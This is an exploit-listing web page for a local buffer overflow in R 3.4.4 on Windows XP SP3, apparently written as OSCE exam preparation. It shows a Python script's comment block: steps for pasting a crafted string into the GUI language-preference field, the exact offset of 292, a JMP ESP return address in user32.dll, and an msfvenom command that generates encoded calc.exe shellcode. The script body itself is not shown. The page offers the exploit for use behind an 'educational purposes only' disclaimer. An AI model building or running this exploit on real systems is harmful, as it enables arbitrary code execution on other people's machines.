R 3.4.4 xp sp3 buffer overflow (non seh) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-01-28 |
Type : local |
Platform : windows
This exploit / vulnerability R 3.4.4 xp sp3 buffer overflow (non seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python
# Exploit Title: R 3.4.4 - Local Buffer Overflow (Windows XP SP3)
# Date: 21/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://cloud.r-project.org/bin/windows/
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems
# Version: 3.4.4
# Tested on: Windows XP Prof SP3 ENG x86
# Note: No SEH exploitation required (SEH for Windows 7 by ZwX available on exploit-db).
# CVE: TBC from Mitre
# Created in preparation for OSCE - DC - Telspace Systems
# Used alpha_upper with "\x00" for badchars
# PoC:
# 1.) Generate exploit-calc-final.txt, copy the contents to clipboard
# 2.) In application, open 'Gui Preferences' under "Edit" open app, select Edit, select 'GUI preferences'
# 3.) Paste the contents of exploit-calc-final.txt under 'Language for menus and messages'
# 4.) Click OK
#Exact offset 292
#7E429353 FFE4 JMP ESP - user32.dll
#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -e x86/alpha_upper -b '\x00' -f c